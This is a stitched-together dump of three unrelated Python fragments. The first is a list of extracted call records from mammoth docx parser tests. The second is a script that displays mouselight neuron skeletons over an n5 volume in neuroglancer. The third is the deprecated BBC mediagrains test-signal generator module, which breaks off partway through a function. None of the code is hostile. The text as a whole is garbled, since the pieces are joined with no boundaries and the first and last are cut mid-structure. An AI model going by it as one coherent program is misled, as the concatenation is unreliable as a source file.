'nose.tools.assert_equal', 'assert_equal', (['[]', 'result.messages'], {}), '([], result.messages)\n', (8738, 8759), False, 'from nose.tools import istest, assert_equal\n'), ((8845, 8873), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:huh"""', '{}', '[]'], {}), "('w:huh', {}, [])\n", (8856, 8873), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((8891, 8925), 'mammoth.docx.document_xml.read_document_xml_element', 'read_document_xml_element', (['element'], {}), '(element)\n', (8916, 8925), False, 'from mammoth.docx.document_xml import read_document_xml_element\n'), ((8953, 9014), 
'mammoth.results.warning', 'results.warning', (['"""An unrecognised element was ignored: w:huh"""'], {}), "('An unrecognised element was ignored: w:huh')\n", (8968, 9014), False, 'from mammoth import documents, results\n'), ((9023, 9072), 'nose.tools.assert_equal', 'assert_equal', (['[expected_warning]', 'result.messages'], {}), '([expected_warning], result.messages)\n', (9035, 9072), False, 'from nose.tools import istest, assert_equal\n'), ((9157, 9185), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:huh"""', '{}', '[]'], {}), "('w:huh', {}, [])\n", (9168, 9185), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((10667, 10714), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""wp:docPr"""', "{'descr': description}"], {}), "('wp:docPr', {'descr': description})\n", (10678, 10714), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((533, 557), 'mammoth.documents.Text', 'documents.Text', (['"""Hello!"""'], {}), "('Hello!')\n", (547, 557), False, 'from mammoth import documents, results\n'), ((4607, 4622), 'mammoth.documents.tab', 'documents.tab', ([], {}), '()\n', (4620, 4622), False, 'from mammoth import documents, results\n'), ((6706, 6729), 'io.BytesIO', 'io.BytesIO', (['image_bytes'], {}), '(image_bytes)\n', (6716, 6729), False, 'import io\n'), ((7858, 7881), 'io.BytesIO', 'io.BytesIO', (['image_bytes'], {}), '(image_bytes)\n', (7868, 7881), False, 'import io\n'), ((10162, 10177), 'mammoth.docx.xmlparser.text', 'xml_text', (['value'], {}), '(value)\n', (10170, 10177), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((2473, 2510), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:ilvl"""', "{'w:val': '1'}"], {}), "('w:ilvl', {'w:val': '1'})\n", (2484, 2510), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((2524, 2563), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:numId"""', 
"{'w:val': '42'}"], {}), "('w:numId', {'w:val': '42'})\n", (2535, 2563), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((3777, 3795), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:b"""'], {}), "('w:b')\n", (3788, 3795), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((4138, 4156), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:i"""'], {}), "('w:i')\n", (4149, 4156), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((5505, 5546), 'mammoth.docx.relationships_xml.Relationship', 'Relationship', ([], {'target': '"""http://example.com"""'}), "(target='http://example.com')\n", (5517, 5546), False, 'from mammoth.docx.relationships_xml import Relationships, Relationship\n'), ((6104, 6121), 'mammoth.documents.run', 'documents.run', (['[]'], {}), '([])\n', (6117, 6121), False, 'from mammoth import documents, results\n'), ((6548, 6584), 'mammoth.docx.relationships_xml.Relationship', 'Relationship', ([], {'target': '"""media/hat.png"""'}), "(target='media/hat.png')\n", (6560, 6584), False, 'from mammoth.docx.relationships_xml import Relationships, Relationship\n'), ((7700, 7736), 'mammoth.docx.relationships_xml.Relationship', 'Relationship', ([], {'target': '"""media/hat.png"""'}), "(target='media/hat.png')\n", (7712, 7736), False, 'from mammoth.docx.relationships_xml import Relationships, Relationship\n'), ((9213, 9247), 'mammoth.docx.document_xml.read_document_xml_element', 'read_document_xml_element', (['element'], {}), '(element)\n', (9238, 9247), False, 'from mammoth.docx.document_xml import read_document_xml_element\n'), ((9388, 9416), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:huh"""', '{}', '[]'], {}), "('w:huh', {}, [])\n", (9399, 9416), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((9508, 9542), 'mammoth.docx.document_xml.read_document_xml_element', 
'read_document_xml_element', (['element'], {}), '(element)\n', (9533, 9542), False, 'from mammoth.docx.document_xml import read_document_xml_element\n'), ((761, 785), 'mammoth.documents.Text', 'documents.Text', (['"""Hello!"""'], {}), "('Hello!')\n", (775, 785), False, 'from mammoth import documents, results\n'), ((2771, 2807), 'mammoth.documents.numbering_level', 'documents.numbering_level', (['"""1"""', '(True)'], {}), "('1', True)\n", (2796, 2807), False, 'from mammoth import documents, results\n'), ((4904, 4921), 'mammoth.documents.run', 'documents.run', (['[]'], {}), '([])\n', (4917, 4921), False, 'from mammoth import documents, results\n'), ((5277, 5294), 'mammoth.documents.run', 'documents.run', (['[]'], {}), '([])\n', (5290, 5294), False, 'from mammoth import documents, results\n'), ((5753, 5770), 'mammoth.documents.run', 'documents.run', (['[]'], {}), '([])\n', (5766, 5770), False, 'from mammoth import documents, results\n'), ((9468, 9492), 'mammoth.documents.Text', 'documents.Text', (['"""Hello!"""'], {}), "('Hello!')\n", (9482, 9492), False, 'from mammoth import documents, results\n'), ((4804, 4822), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:r"""'], {}), "('w:r')\n", (4815, 4822), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((5177, 5195), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:r"""'], {}), "('w:r')\n", (5188, 5195), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((6648, 6670), 'funk.allows', 'funk.allows', (['docx_file'], {}), '(docx_file)\n', (6659, 6670), False, 'import funk\n'), ((6787, 6813), 'funk.allows', 'funk.allows', (['content_types'], {}), '(content_types)\n', (6798, 6813), False, 'import funk\n'), ((7800, 7822), 'funk.allows', 'funk.allows', (['docx_file'], {}), '(docx_file)\n', (7811, 7822), False, 'import funk\n'), ((7939, 7965), 'funk.allows', 'funk.allows', (['content_types'], {}), '(content_types)\n', (7950, 7965), False, 
'import funk\n'), ((1045, 1069), 'mammoth.documents.Text', 'documents.Text', (['"""Hello!"""'], {}), "('Hello!')\n", (1059, 1069), False, 'from mammoth import documents, results\n'), ((1349, 1373), 'mammoth.documents.Text', 'documents.Text', (['"""Hello!"""'], {}), "('Hello!')\n", (1363, 1373), False, 'from mammoth import documents, results\n'), ((10925, 10976), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""a:blip"""', "{'r:embed': relationship_id}"], {}), "('a:blip', {'r:embed': relationship_id})\n", (10936, 10976), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n')] |
from funlib.show.neuroglancer import add_layer, ScalePyramid
import argparse
import daisy
import glob
import neuroglancer
import numpy as np
import os
import webbrowser
from swc_parser import _parse_swc
from pathlib import Path
import itertools
import random
import logging
# Monotonically increasing id generator shared by every neuroglancer
# annotation (nodes and edges) created further down in this script.
ngid = itertools.count(start=1)
parser = argparse.ArgumentParser()
parser.add_argument(
    "--file", "-f", type=str, action="append", help="The path to the container to show"
)
parser.add_argument(
    "--datasets",
    "-d",
    type=str,
    nargs="+",
    action="append",
    help="The datasets in the container to show",
)
parser.add_argument(
    "--synapses",
    "-s",
    type=str,
    action="append",
    help="A numpy npz containing synapse annotations as stored by "
    "synful.gunpowder.ExtractSynapses",
)
parser.add_argument(
    "--time",
    "-t",
    type=int,
    action="store",
    dest="minutes",
    default=0,
    help="How long you want neuroglancer to stay available",
)
parser.add_argument(
    "--output",
    "-o",
    type=str,
    action="store",
    dest="log",
    default="",
    help="Where to output url to",
)
args = parser.parse_args()
print("passed in arguments: {}".format(args))
minutes = args.minutes
print("showing neuroglancer for {} minutes".format(minutes))
# Log to the file given via --output when provided, otherwise to stderr;
# the viewer URL is emitted through this logger at the end of the script.
if args.log != "":
    logging.basicConfig(level=logging.INFO, filename=args.log)
else:
    logging.basicConfig(level=logging.INFO)
# Bind the neuroglancer server on all interfaces so the viewer is reachable
# from other machines (e.g. when this runs on a cluster node).
neuroglancer.set_server_bind_address("0.0.0.0")
viewer = neuroglancer.Viewer()
# NOTE(review): an earlier assignment pointed swc_path at the 2017-07-02
# consensus swc and was immediately overwritten; that dead assignment has
# been removed — only the 2018-07-02 skeleton below was ever used.
swc_path = Path(
    "/groups/mousebrainmicro/mousebrainmicro/cluster/2018-07-02/carver/augmented-with-skeleton-nodes-as-swcs/G-002.swc"
)
# Carved n5 image volume matching the skeleton above.
n5_path = Path(
    "/nrs/funke/mouselight-v2/2018-07-02",
    "consensus-neurons-with-machine-centerpoints-labelled-as-swcs-carved.n5/",
)
# Text file of name:value constants describing the sample's voxel grid
# (parsed by load_transform below into origin and spacing).
transform = Path("/nrs/mouselight/SAMPLES/2018-07-02/transform.txt")
def load_transform(transform_path: Path):
    """Parse a mouselight ``transform.txt`` into voxel origin and spacing.

    The file holds one ``name:value`` pair per line.  Spacing is computed
    from the sx/sy/sz constants, scaled down by the number of resolution
    levels (nl) and converted from nanometres; the origin (ox/oy/oz) is
    snapped onto that spacing grid.

    :param transform_path: path to the transform text file
    :return: tuple ``(origin, spacing)`` of numpy arrays in x, y, z order
    """
    constants = {}
    for entry in transform_path.read_text().split("\n"):
        if entry:
            name, raw_value = entry.split(":")
            constants[name] = float(raw_value)

    sample_steps = np.array([constants["sx"], constants["sy"], constants["sz"]])
    spacing = sample_steps / 2 ** (constants["nl"] - 1) / 1000

    sample_offsets = np.array([constants["ox"], constants["oy"], constants["oz"]])
    origin = spacing * ((sample_offsets // spacing) / 1000)

    return origin, spacing
def swc_to_voxel_coords(swc_coord, origin, spacing):
    """Map a world-space swc coordinate onto the integer voxel grid.

    :param swc_coord: coordinate from the swc file (same units as origin/spacing)
    :param origin: grid origin, as returned by ``load_transform``
    :param spacing: voxel size, as returned by ``load_transform``
    :return: integer numpy array of voxel indices
    """
    relative = (swc_coord - origin) / spacing
    return np.round(relative).astype(int)
# Parse the consensus skeleton and turn its nodes/edges into neuroglancer
# annotations, then serve them alongside the carved image volume.
neuron_graph = _parse_swc(swc_path)
origin, spacing = load_transform(transform)
voxel_size = spacing
# NOTE(review): hard-coded rounded voxel size, reversed from (10, 3, 3);
# appears unused below — confirm before removing.
voxel_size_rounded = np.array((10, 3, 3)[::-1])
nodes = []
edges = []
print(len(neuron_graph.nodes))
for node_a, node_b in neuron_graph.edges:
    # Convert both endpoints of the edge from world coordinates to voxels.
    a = swc_to_voxel_coords(neuron_graph.nodes[node_a]["location"], origin, spacing)
    b = swc_to_voxel_coords(neuron_graph.nodes[node_b]["location"], origin, spacing)
    pos_u = a
    pos_v = b
    nodes.append(
        neuroglancer.EllipsoidAnnotation(
            center=pos_u, radii=(3, 3, 3) / voxel_size, id=next(ngid)
        )
    )
    edges.append(
        neuroglancer.LineAnnotation(point_a=pos_u, point_b=pos_v, id=next(ngid))
    )
    # Cap the number of annotations so the viewer stays responsive.
    if len(nodes) > 10000:
        break
# Mark the last visited endpoint with a smaller ellipsoid.
nodes.append(
    neuroglancer.EllipsoidAnnotation(
        center=pos_v, radii=(1, 1, 1) / voxel_size, id=next(ngid)
    )
)
a = daisy.open_ds(str(n5_path.absolute()), "volume")
with viewer.txn() as s:
    add_layer(s, a, "volume", shader="rgb", c=[0, 0, 0])
with viewer.txn() as s:
    s.layers["edges"] = neuroglancer.AnnotationLayer(
        filter_by_segmentation=False, annotation_color="#add8e6", annotations=edges
    )
    s.layers["nodes"] = neuroglancer.AnnotationLayer(
        filter_by_segmentation=False, annotation_color="#ff00ff", annotations=nodes
    )
url = str(viewer)
logging.info(url)
import time
# Keep the server alive for the requested duration; with --time 0 fall
# through immediately and wait for the user to press ENTER instead.
time.sleep(60 * minutes)
try:
    if minutes < 1:
        input("Press ENTER to exit:")
except:
    pass
| [
"logging.basicConfig",
"funlib.show.neuroglancer.add_layer",
"argparse.ArgumentParser",
"pathlib.Path",
"neuroglancer.Viewer",
"numpy.round",
"time.sleep",
"neuroglancer.set_server_bind_address",
"numpy.array",
"itertools.count",
"neuroglancer.AnnotationLayer",
"logging.info",
"swc_parser._p... | [((282, 306), 'itertools.count', 'itertools.count', ([], {'start': '(1)'}), '(start=1)\n', (297, 306), False, 'import itertools\n'), ((317, 342), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (340, 342), False, 'import argparse\n'), ((1419, 1466), 'neuroglancer.set_server_bind_address', 'neuroglancer.set_server_bind_address', (['"""0.0.0.0"""'], {}), "('0.0.0.0')\n", (1455, 1466), False, 'import neuroglancer\n'), ((1476, 1497), 'neuroglancer.Viewer', 'neuroglancer.Viewer', ([], {}), '()\n', (1495, 1497), False, 'import neuroglancer\n'), ((1510, 1631), 'pathlib.Path', 'Path', (['"""/nrs/funke/mouselight-v2/2017-07-02"""', '"""consensus-neurons-with-machine-centerpoints-labelled-as-swcs/G-002.swc"""'], {}), "('/nrs/funke/mouselight-v2/2017-07-02',\n 'consensus-neurons-with-machine-centerpoints-labelled-as-swcs/G-002.swc')\n", (1514, 1631), False, 'from pathlib import Path\n'), ((1650, 1781), 'pathlib.Path', 'Path', (['"""/groups/mousebrainmicro/mousebrainmicro/cluster/2018-07-02/carver/augmented-with-skeleton-nodes-as-swcs/G-002.swc"""'], {}), "(\n '/groups/mousebrainmicro/mousebrainmicro/cluster/2018-07-02/carver/augmented-with-skeleton-nodes-as-swcs/G-002.swc'\n )\n", (1654, 1781), False, 'from pathlib import Path\n'), ((1788, 1910), 'pathlib.Path', 'Path', (['"""/nrs/funke/mouselight-v2/2018-07-02"""', '"""consensus-neurons-with-machine-centerpoints-labelled-as-swcs-carved.n5/"""'], {}), "('/nrs/funke/mouselight-v2/2018-07-02',\n 'consensus-neurons-with-machine-centerpoints-labelled-as-swcs-carved.n5/')\n", (1792, 1910), False, 'from pathlib import Path\n'), ((1930, 1986), 'pathlib.Path', 'Path', (['"""/nrs/mouselight/SAMPLES/2018-07-02/transform.txt"""'], {}), "('/nrs/mouselight/SAMPLES/2018-07-02/transform.txt')\n", (1934, 1986), False, 'from pathlib import Path\n'), ((2706, 2726), 'swc_parser._parse_swc', '_parse_swc', (['swc_path'], {}), '(swc_path)\n', (2716, 2726), False, 'from swc_parser import _parse_swc\n'), 
((2814, 2840), 'numpy.array', 'np.array', (['(10, 3, 3)[::-1]'], {}), '((10, 3, 3)[::-1])\n', (2822, 2840), True, 'import numpy as np\n'), ((4025, 4042), 'logging.info', 'logging.info', (['url'], {}), '(url)\n', (4037, 4042), False, 'import logging\n'), ((4057, 4081), 'time.sleep', 'time.sleep', (['(60 * minutes)'], {}), '(60 * minutes)\n', (4067, 4081), False, 'import time\n'), ((1309, 1367), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'filename': 'args.log'}), '(level=logging.INFO, filename=args.log)\n', (1328, 1367), False, 'import logging\n'), ((1378, 1417), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (1397, 1417), False, 'import logging\n'), ((3640, 3692), 'funlib.show.neuroglancer.add_layer', 'add_layer', (['s', 'a', '"""volume"""'], {'shader': '"""rgb"""', 'c': '[0, 0, 0]'}), "(s, a, 'volume', shader='rgb', c=[0, 0, 0])\n", (3649, 3692), False, 'from funlib.show.neuroglancer import add_layer, ScalePyramid\n'), ((3742, 3852), 'neuroglancer.AnnotationLayer', 'neuroglancer.AnnotationLayer', ([], {'filter_by_segmentation': '(False)', 'annotation_color': '"""#add8e6"""', 'annotations': 'edges'}), "(filter_by_segmentation=False, annotation_color\n ='#add8e6', annotations=edges)\n", (3770, 3852), False, 'import neuroglancer\n'), ((3886, 3996), 'neuroglancer.AnnotationLayer', 'neuroglancer.AnnotationLayer', ([], {'filter_by_segmentation': '(False)', 'annotation_color': '"""#ff00ff"""', 'annotations': 'nodes'}), "(filter_by_segmentation=False, annotation_color\n ='#ff00ff', annotations=nodes)\n", (3914, 3996), False, 'import neuroglancer\n'), ((2288, 2349), 'numpy.array', 'np.array', (["[constants['sx'], constants['sy'], constants['sz']]"], {}), "([constants['sx'], constants['sy'], constants['sz']])\n", (2296, 2349), True, 'import numpy as np\n'), ((2630, 2670), 'numpy.round', 'np.round', (['((swc_coord - origin) / spacing)'], {}), '((swc_coord - origin) / spacing)\n', 
(2638, 2670), True, 'import numpy as np\n'), ((2442, 2503), 'numpy.array', 'np.array', (["[constants['ox'], constants['oy'], constants['oz']]"], {}), "([constants['ox'], constants['oy'], constants['oz']])\n", (2450, 2503), True, 'import numpy as np\n')] |
#
# Copyright 2018 British Broadcasting Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""\
The submodule of mediagrains which contains code for generating test video
grains.
This module is deprecated, please use mediagrains.patterngenerators instead.
"""
from fractions import Fraction
from mediatimestamp.immutable import TimeOffset, Timestamp
from copy import deepcopy
import struct
import fractions
from deprecated import deprecated
from . import AudioGrain
from .cogenums import CogFrameFormat, CogAudioFormat
from .patterngenerators.video import LumaSteps as LumaStepsPatternGenerator
from .patterngenerators.video import ColourBars as ColourBarsPatternGenerator
from .patterngenerators.audio import Tone as TonePatternGenerator
from .patterngenerators.audio import Silence as SilencePatternGenerator
__all__ = ["LumaSteps", "Tone1K", "Tone", "Silence", "ColourBars", "MovingBarOverlay"]
# Per-format pixel layout information used by the generators below.
# Each entry maps a CogFrameFormat to a tuple, with the three
# (offset, range) pairs given in Y, U, V order:
#   (num_bytes_per_sample, (offset, range), (offset, range), (offset, range), active_bits_per_sample)
# where `offset` is the component's black/neutral level and `range` the span
# of legal video levels at that format's bit depth.
pixel_ranges = {
    CogFrameFormat.U8_444: (1, (16, 235-16), (128, 224), (128, 224), 8),
    CogFrameFormat.U8_422: (1, (16, 235-16), (128, 224), (128, 224), 8),
    CogFrameFormat.U8_420: (1, (16, 235-16), (128, 224), (128, 224), 8),
    CogFrameFormat.S16_444_10BIT: (2, (64, 940-64), (512, 896), (512, 896), 10),
    CogFrameFormat.S16_422_10BIT: (2, (64, 940-64), (512, 896), (512, 896), 10),
    CogFrameFormat.S16_420_10BIT: (2, (64, 940-64), (512, 896), (512, 896), 10),
    CogFrameFormat.S16_444_12BIT: (2, (256, 3760-256), (2048, 3584), (2048, 3584), 12),
    CogFrameFormat.S16_422_12BIT: (2, (256, 3760-256), (2048, 3584), (2048, 3584), 12),
    CogFrameFormat.S16_420_12BIT: (2, (256, 3760-256), (2048, 3584), (2048, 3584), 12),
    CogFrameFormat.S16_444: (2, (4096, 60160-4096), (32768, 57344), (32768, 57344), 16),
    CogFrameFormat.S16_422: (2, (4096, 60160-4096), (32768, 57344), (32768, 57344), 16),
    CogFrameFormat.S16_420: (2, (4096, 60160-4096), (32768, 57344), (32768, 57344), 16),
}
@deprecated(version="2.13.0", reason="Please use mediagrains.patterngenerators instead")
def LumaSteps(src_id, flow_id, width, height,
              rate=Fraction(25, 1),
              origin_timestamp=None,
              cog_frame_format=CogFrameFormat.U8_444,
              step=1):
    """Yield video grains containing a luma-steps test pattern.

    :param src_id: source_id for grains
    :param flow_id: flow_id for grains
    :param width: width of grains
    :param height: height of grains
    :param rate: rate of grains
    :param origin_timestamp: the origin timestamp of the first grain (defaults to now)
    :param cog_frame_format: video frame format of the grains
    :param step: the number of grains to increment by each time (values above 1 cause skipping)
    """
    if origin_timestamp is None:
        origin_timestamp = Timestamp.get_time()
    # Delegate to the replacement pattern generator and slice it starting at
    # the requested origin, advancing `step` grains per iteration.
    generator = LumaStepsPatternGenerator(
        src_id,
        flow_id,
        width,
        height,
        rate=rate,
        cog_frame_format=cog_frame_format)
    yield from generator[origin_timestamp::step]
@deprecated(version="2.13.0", reason="Please use mediagrains.patterngenerators instead")
def ColourBars(src_id, flow_id, width, height,
               intensity=0.75,
               rate=Fraction(25, 1),
               origin_timestamp=None,
               cog_frame_format=CogFrameFormat.U8_444,
               step=1):
    """Yield colour-bar video grains in the specified format.

    :param src_id: source_id for grains
    :param flow_id: flow_id for grains
    :param width: width of grains
    :param height: height of grains
    :param intensity: intensity of colour bars (usually 1.0 or 0.75)
    :param rate: rate of grains
    :param origin_timestamp: the origin timestamp of the first grain (defaults to now)
    :param cog_frame_format: video frame format of the grains
    :param step: the number of grains to increment by each time (values above 1 cause skipping)
    """
    if origin_timestamp is None:
        origin_timestamp = Timestamp.get_time()
    # Delegate to the replacement pattern generator and slice it starting at
    # the requested origin, advancing `step` grains per iteration.
    generator = ColourBarsPatternGenerator(
        src_id,
        flow_id,
        width,
        height,
        intensity=intensity,
        rate=rate,
        cog_frame_format=cog_frame_format)
    yield from generator[origin_timestamp::step]
@deprecated(version="2.13.0", reason="Please use mediagrains.patterngenerators instead")
def MovingBarOverlay(grain_gen, height=100, speed=1.0):
    """Call this method and pass an iterable of video grains as the first parameter. This method will overlay a moving black bar onto the grains.

    :param grain_gen: An iterable which yields video grains
    :param height: The height of the bar in pixels
    :param speed: A floating point speed in pixels per frame
    :returns: A generator which yields video grains
    """
    bar = None
    for grain in grain_gen:
        # Vertical subsampling factor of chroma relative to luma (1 for
        # 4:4:4/4:2:2, 2 for 4:2:0), computed with a round-up division.
        v_subs = (grain.components[0].height + grain.components[1].height - 1)//grain.components[1].height
        if bar is None:
            # Lazily build one bar's worth of pixel data per plane on the
            # first grain: its format fixes bytes-per-sample and levels.
            if grain.format not in pixel_ranges:
                raise ValueError("Not a supported format for this generator")
            _bpp = pixel_ranges[grain.format][0]
            bar = [bytearray(grain.components[0].width*_bpp * height),
                   bytearray(grain.components[1].width*_bpp * height // v_subs),
                   bytearray(grain.components[2].width*_bpp * height // v_subs)]
            # Fill the luma plane of the bar with the format's black level
            # (low byte first when samples are wider than one byte).
            for y in range(0, height):
                for x in range(0, grain.components[0].width):
                    bar[0][y*grain.components[0].width * _bpp + _bpp*x + 0] = pixel_ranges[grain.format][1][0] & 0xFF
                    if _bpp > 1:
                        bar[0][y*grain.components[0].width * _bpp + _bpp*x + 1] = pixel_ranges[grain.format][1][0] >> 8
            # Fill both chroma planes with their neutral (mid-range) levels.
            for y in range(0, height // v_subs):
                for x in range(0, grain.components[1].width):
                    bar[1][y*grain.components[1].width * _bpp + _bpp*x + 0] = pixel_ranges[grain.format][2][0] & 0xFF
                    if _bpp > 1:
                        bar[1][y*grain.components[1].width * _bpp + _bpp*x + 1] = pixel_ranges[grain.format][2][0] >> 8
                    bar[2][y*grain.components[2].width * _bpp + _bpp*x + 0] = pixel_ranges[grain.format][3][0] & 0xFF
                    if _bpp > 1:
                        bar[2][y*grain.components[2].width * _bpp + _bpp*x + 1] = pixel_ranges[grain.format][3][0] >> 8
        # Bar position for this frame: the grain's origin timestamp converted
        # to a frame count at the grain's rate, scaled by `speed`.
        fnum = int(speed*grain.origin_timestamp.to_count(grain.rate.numerator, grain.rate.denominator))
        # Copy the bar's rows into the luma plane, wrapping vertically.
        for y in range(0, height):
            grain.data[
                grain.components[0].offset + ((fnum + y) % grain.components[0].height)*grain.components[0].stride:
                grain.components[0].offset + ((fnum + y) % grain.components[0].height)*grain.components[0].stride + grain.components[0].width*_bpp] = (
                    bar[0][y*grain.components[0].width * _bpp: (y+1)*grain.components[0].width * _bpp])
        # And likewise into both (vertically subsampled) chroma planes.
        for y in range(0, height // v_subs):
            grain.data[
                grain.components[1].offset + ((fnum//v_subs + y) % grain.components[1].height)*grain.components[1].stride:
                grain.components[1].offset + ((fnum//v_subs + y) % grain.components[1].height)*grain.components[1].stride + grain.components[1].width*_bpp] = (
                    bar[1][y*grain.components[1].width * _bpp: (y+1)*grain.components[1].width * _bpp])
            grain.data[
                grain.components[2].offset + ((fnum//v_subs + y) % grain.components[2].height)*grain.components[2].stride:
                grain.components[2].offset + ((fnum//v_subs + y) % grain.components[2].height)*grain.components[2].stride + grain.components[2].width*_bpp] = (
                    bar[2][y*grain.components[2].width * _bpp: (y+1)*grain.components[2].width * _bpp])
        yield grain
@deprecated(version="2.13.0", reason="Please use mediagrains.patterngenerators instead")
def Tone1K(src_id, flow_id,
           samples=1920,
           channels=1,
           origin_timestamp=None,
           cog_audio_format=CogAudioFormat.S16_INTERLEAVED,
           step=1,
           sample_rate=48000):
    """Convenience wrapper around :func:`Tone` with the frequency fixed at 1kHz."""
    return Tone(
        src_id,
        flow_id,
        1000,
        samples=samples,
        channels=channels,
        origin_timestamp=origin_timestamp,
        cog_audio_format=cog_audio_format,
        step=step,
        sample_rate=sample_rate,
    )
@deprecated(version="2.13.0", reason="Please use mediagrains.patterngenerators instead")
def Tone(src_id, flow_id,
         frequency,
         samples=1920,
         channels=1,
         origin_timestamp=None,
         cog_audio_format=CogAudioFormat.S16_INTERLEAVED,
         step=1,
         sample_rate=48000):
    """Yield audio grains containing a tone at the given frequency.

    :param src_id: source_id for grains
    :param flow_id: flow_id for grains
    :param frequency: tone frequency in Hz
    :param samples: number of audio samples per grain
    :param channels: number of audio channels
    :param origin_timestamp: the origin timestamp of the first grain (defaults to now)
    :param cog_audio_format: audio sample format of the grains
    :param step: the number of grains to increment by each time (values above 1 cause skipping)
    :param sample_rate: audio sample rate in Hz
    """
    if origin_timestamp is None:
        origin_timestamp = Timestamp.get_time()
    generator = TonePatternGenerator(
        src_id,
        flow_id,
        frequency=frequency,
        samples=samples,
        channels=channels,
        cog_audio_format=cog_audio_format,
        sample_rate=sample_rate)
    # The generator is sliced from the epoch; shift each grain's timestamps
    # onto the requested origin before yielding it.
    for grain in generator[Timestamp()::step]:
        grain.origin_timestamp = grain.origin_timestamp + origin_timestamp
        grain.sync_timestamp = grain.sync_timestamp + origin_timestamp
        yield grain
@deprecated(version="2.13.0", reason="Please use mediagrains.patterngenerators instead")
def Silence(src_id, flow_id,
            samples=1920,
            channels=1,
            origin_timestamp=None,
            cog_audio_format=CogAudioFormat.S16_INTERLEAVED,
            step=1,
            sample_rate=48000):
    """Yield audio grains containing silence.

    :param src_id: source_id for grains
    :param flow_id: flow_id for grains
    :param samples: number of audio samples per grain
    :param channels: number of audio channels
    :param origin_timestamp: the origin timestamp of the first grain (defaults to now)
    :param cog_audio_format: audio sample format of the grains
    :param step: the number of grains to increment by each time (values above 1 cause skipping)
    :param sample_rate: audio sample rate in Hz
    """
    if origin_timestamp is None:
        origin_timestamp = Timestamp.get_time()
    generator = SilencePatternGenerator(
        src_id,
        flow_id,
        samples=samples,
        channels=channels,
        cog_audio_format=cog_audio_format,
        sample_rate=sample_rate)
    # The generator is sliced from the epoch; shift each grain's timestamps
    # onto the requested origin before yielding it.
    for grain in generator[Timestamp()::step]:
        grain.origin_timestamp = grain.origin_timestamp + origin_timestamp
        grain.sync_timestamp = grain.sync_timestamp + origin_timestamp
        yield grain
@deprecated(version="2.13.0", reason="Please use mediagrains.patterngenerators instead")
def AudioGrainsLoopingData(src_id, flow_id,
                           sample_data,
                           samples=1920,
                           channels=1,
                           origin_timestamp=None,
                           cog_audio_format=CogAudioFormat.S16_INTERLEAVED,
                           step=1,
                           volume=0.5,
                           sample_rate=48000):
    """
    A generator which yields audio grains of a specified format using input
    data in the form of a list of floating point values that will be repeated
    as samples indefinitely.

    :param src_id: source_id for grains
    :param flow_id: flow_id for grains
    :param sample_data: list of floating point sample values, looped to fill grains
    :param samples: number of audio samples per grain
    :param channels: number of audio channels
    :param origin_timestamp: the origin timestamp of the first grain (defaults to the grain's own)
    :param cog_audio_format: audio sample format of the grains
    :param step: the number of grains to increment by each time (values above 1 cause skipping)
    :param volume: scale factor applied to sample_data before quantisation
    :param sample_rate: audio sample rate in Hz
    """
    # Cache of packed payloads keyed by the loop offset at which a grain's
    # data starts, so each distinct offset is only packed once.
    data_samples = {}
    # Quantise (or merely scale, for the float formats) the input data once
    # up front, and record the packing depth used by make_samples below.
    # NOTE(review): an unrecognised cog_audio_format leaves
    # formatted_sample_data and depth unset, causing a NameError later —
    # confirm callers only pass the formats listed here.
    if cog_audio_format in [CogAudioFormat.S16_PLANES,
                            CogAudioFormat.S16_PAIRS,
                            CogAudioFormat.S16_INTERLEAVED]:
        formatted_sample_data = [round(x*volume*(1 << 15)) for x in sample_data]
        depth = 16
    elif cog_audio_format in [CogAudioFormat.S24_PLANES,
                              CogAudioFormat.S24_PAIRS,
                              CogAudioFormat.S24_INTERLEAVED]:
        formatted_sample_data = [round(x*volume*(1 << 23)) for x in sample_data]
        depth = 24
    elif cog_audio_format in [CogAudioFormat.S32_PLANES,
                              CogAudioFormat.S32_PAIRS,
                              CogAudioFormat.S32_INTERLEAVED]:
        formatted_sample_data = [round(x*volume*(1 << 31)) for x in sample_data]
        depth = 32
    elif cog_audio_format in [CogAudioFormat.FLOAT_PLANES,
                              CogAudioFormat.FLOAT_PAIRS,
                              CogAudioFormat.FLOAT_INTERLEAVED]:
        formatted_sample_data = [x*volume for x in sample_data]
        depth = 'f'
    elif cog_audio_format in [CogAudioFormat.DOUBLE_PLANES,
                              CogAudioFormat.DOUBLE_PAIRS,
                              CogAudioFormat.DOUBLE_INTERLEAVED]:
        formatted_sample_data = [x*volume for x in sample_data]
        depth = 'd'
    # Channel-layout flags: exactly one of these is set by the format.
    planes = False
    pairs = False
    interleaved = False
